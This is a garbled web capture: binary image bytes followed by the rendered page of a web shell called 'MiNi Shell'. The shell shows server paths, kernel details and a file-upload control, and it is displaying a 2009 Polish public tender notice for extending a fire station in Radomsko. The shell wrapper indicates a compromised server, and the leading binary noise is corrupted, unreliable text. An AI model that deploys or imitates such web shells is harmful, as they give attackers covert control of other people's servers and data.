JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090128/29397-N-2009.html

<p class="kh_header"><b>Radomsko: Rozbudowa budynku strażnicy Komendy Powiatowej Państwowej Straży Pożarnej w Radomsku</b><br>
<b>Numer ogłoszenia: 29397 - 2009; data zamieszczenia: 28.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Radomsku , ul. Żeromskiego 19, 97-500 Radomsko, woj. łódzkie, tel. 0-44 6859400, 6859407, faks 0-44 6859410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> kppspradomsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja zespolona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku strażnicy Komendy Powiatowej Państwowej Straży Pożarnej w Radomsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania inwestycyjnego: /Rozbudowa budynku głównego strażnicy Komendy Powiatowej PSP w Radomsku/. Zadanie obejmuje wykonanie stanu surowego otwartego dobudowy /budynek podpiwniczony, dwukondygnacyjny kryty stropodachem/.
Szczegółowy opis przedmiotu zamówienia stanowią załączniki:
- załącznik Nr 1 do SIWZ - PROJEKT ARCHITEKTONICZNO-BUDOWLANY 
- załącznik nr 2 do SIWZ - PROJEKT KONSTRUKCJI OBLICZENIA, RYSUNKI
- załącznik nr 3 d SIWZ - SPECYFIKACJA TECHNICZNA WYKONANIA O ODBIORU ROBÓT BUDOWLANYCH
- załącznik nr 4 do SIWZ - PRZEDMIARY ROBÓT.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.21-8, 45.21.61.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wadium, które musi być wniesione przed upływem terminu składania ofert. Oferta Wykonawcy musi być zabezpieczona wadium o wartości: 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b, ust. 5, pkt 2 ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.  z 2007 roku, Nr 42, poz.275)
Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego: 
Bank Spółdzielczy w Radomsku nr: 75 8980 0009 2001 0067 5006 0006.  
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego.
Jeżeli wadium zostanie wniesione w pieniądzu, tj. przelewem, Wykonawca dołącza do oferty kopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: /Wadium - przetarg na rozbudowę budynku strażnicy Komendy Powiatowej Państwowej Straży Pożarnej w Radomsku/. 
Jeżeli wadium zostanie wniesione w formach określonych w punkcie VI podpunkty od 2 do 5 wówczas Wykonawca dołączy do oferty kopię dokumentu potwierdzoną za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentacji Wykonawcy. Oryginał dokumentu wystawiony na rzecz Zamawiającego należy złożyć u Głównego Księgowego w pokoju nr 10 w zamkniętym opakowaniu, z dopiskiem: Wadium. Dokument ten musi zachować ważność przez cały okres związania ofertą.
W przypadku, gdy wadium będzie wniesione w formie poręczenia instytucji kredytowych lub gwarancji bankowej lub ubezpieczeniowej /nieodwołalnej, bezwarunkowej/ musi zawierać zapis: Kwota wadium zostanie wypłacona na pierwsze pisemne żądanie Zamawiającego tj. Komendy Powiatowej Państwowej Straży Pożarnej w Radomsku, gdy: 
- wykonawca, po wyborze jego oferty, odmówi podpisania umowy na warunkach określonych w ofercie
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie winy wykonawcy

Dyspozycję w zakresie zwrotu wniesionego w pieniądzu wadium Zamawiający przekaże do banku niezwłocznie po:
a) upływie terminie związania ofertą,
b) zawarciu umowy w sprawie zamówienia publicznego 
c) unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem, iż protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia

Zamawiający niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy:
a) który wycofał ofertę przed upływem terminu składania ofert,
b) który został wykluczony z postępowania
c) którego oferta została odrzucona.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22, ust. 1 ustawy Prawo zamówień publicznych, tj:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2) posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia, tj:
a) wykonawca musi wykazać, że w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował 1 robotę budowlaną polegającą na budowie lub przebudowie budynku o wartości brutto większej lub równej 800000 PLN i kubaturze nie mniejszej niż 2000 m3 (prace zakończone)
b) przy wykonaniu przedmiotu zamówienia zaangażują osobę posiadającą uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno-budowlanej, w zakresie kierowania robotami budowlanymi bez ograniczeń. Osoba ta musi być członkiem Izby Inżynierów Budownictwa.
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj: 
a) posiadają środki finansowe lub zdolność kredytową w wysokości 800 000,00 PLN (słownie: osiemset tysięcy złotych 00/100)
b) posiadają polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnej z przedmiotem zamówienia o wartości nie mniejszej niż 1000000PLN.
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 Prawa Zamówień Publicznych.
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez wykonawcę dokumentów i oświadczeń wyszczególnionych w punkcie IV SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. Uzupełnienie oświadczeń i dokumentów potwierdzających spełnianie wymaganych warunków udziału w postępowaniu oraz dokumentów potwierdzających, że oferta spełnia wymagania Zamawiającego będzie możliwe w przypadku, gdy Wykonawca ich nie złoży do postępowania lub zostaną złożone dokumenty zawierające błędy, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Uzupełnienie dokumentów nastąpi zgodnie z przepisem art. 26 ust. 3 ustawy.
Niespełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania oraz odrzuceniem oferty z postępowania.
Wykonawca ma prawo złożyć tylko jedną ofertę.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum). W takim przypadku oferta musi spełniać następujące wymagania:
- w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z przedsiębiorców wchodzący w skład konsorcjum oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24, ust. 1, pkt 1-9 ustawy Prawo zamówień publicznych. Natomiast doświadczenie, uprawnienia oraz sytuacja ekonomiczna i finansowa będzie oceniana łącznie.
Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich  w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie musi zostać przedłożone wraz z ofertą. 
Jeżeli w niniejszym postępowaniu zostanie wybrana oferta złożona przez konsorcjum Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych podmiotów. 
UWAGA. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania, zgodnie z przepisem art. 23 ust. 2 ustawy - tj. wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo w przypadku składania oferty wspólnej musi być złożone w oryginale lub jego kopii poświadczonej za zgodność przez notariusza. 
Oferta powinna być złożona w formie pisemnej, w języku polskim. Oferta powinna być sporządzona na maszynie do pisania, komputerze lub inną trwałą i czytelną techniką oraz podpisana przez osobę upoważnioną do reprezentowania wykonawcy na zewnątrz i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty.
W przypadku ustanowienia pełnomocnika do działania w imieniu Wykonawcy, należy wraz ofertą przedstawić pełnomocnictwo w oryginale lub jego kopii poświadczonej za zgodność z oryginałem przez notariusza. 
Każda zapisana strona oferty powinna być ponumerowana kolejnymi numerami.
Wszelkie poprawki lub zmiany w tekście oferty muszą być parafowane własnoręcznie przez osobę podpisującą ofertę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące dokumenty i oświadczenia na potwierdzenie spełniania warunków udziału w postępowania:
A) W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy należy złożyć:
- Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
- Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22, ust. 1 ustawy, oraz że nie podlega wykluczeniu z postępowania na podst. art. 24, ust. 1 i 2 ustawy - wg załącznika nr 6 do SIWZ;
- Aktualnej informacji z Krajowego Rejestru Karnego a w zakresie określonym w art. 24, ust. 1, pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1, pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
B) W celu potwierdzenia warunku w zakresie wymaganego doświadczenia Wykonawcy należy złożyć wraz z ofertą:
a) wykaz wykonanych robót budowlanych (załącznik nr 8 do SIWZ) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykazanie co najmniej jednej roboty budowlanej polegającej na budowie lub przebudowie budynku o wartości brutto większej lub równej 800000 PLN i kubaturze nie mniejszej niż 2000 m3. Do wykazu należy dołączyć dokumenty/referencje/ potwierdzające, że wskazane roboty budowlane zostały wykonane należycie. 
b) dokumenty stwierdzające, że kierownik budowy posiada wymagane uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz dokument stwierdzający przynależność do Izby Inżynierów Budownictwa.
C) W celu potwierdzenia warunku posiadanej zdolności ekonomicznej i finansowej Wykonawcy należy złożyć wraz z ofertą:
a) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową w wysokości 800 000,00 PLN - wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
b) polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnej  z przedmiotem zamówienia o wartości nie mniejszej niż 1000000,00PLN.

W/w dokumenty muszą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę.

Ponadto do oferty należy dołączyć:

- wypełniony formularz ofertowy -  załącznik nr 5
- wypełniony kosztorys ofertowy sporządzony zgodnie z przedmiarami robót /załącznik nr 4 do SIWZ/, projektem architektoniczno-budowlanym, projektem konstrukcyjnym oraz specyfikacją techniczną wykonania i odbioru robót
- podpisany przez upoważnionego przedstawiciela Wykonawcy wzór umowy - załącznik nr 7
- dowód wpłaty wadium
Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty na potwierdzenie warunków udziału w postępowaniu zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 roku, Nr 87, poz. 605).
Postępowanie o udzielenie zamówienia jest jawne. Zamawiający może ograniczyć dostęp do informacji związanych z postępowaniem o udzielenie zamówienia tylko w przypadkach określonych w ustawie. Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą być one udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86, ust. 4 uPzp.

Zamawiający zaleca, aby informacje zastrzeżone jako tajemnica przedsiębiorstwa były przez Wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem -tajemnica przedsiębiorstwa- lub spięte (zszyte) oddzielnie od pozostałych, jawnych elementów oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> kppspradomsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Powiatowa PSP w Radomsku 97-500 Radomsko ulica Żeromskiego 19 Sekretariat - pokój nr 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 11:00, miejsce: Komenda Powiatowa PSP w Radomsku 97-500 Radomsko ulica Żeromskiego 19 Sekretariat - pokój nr 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com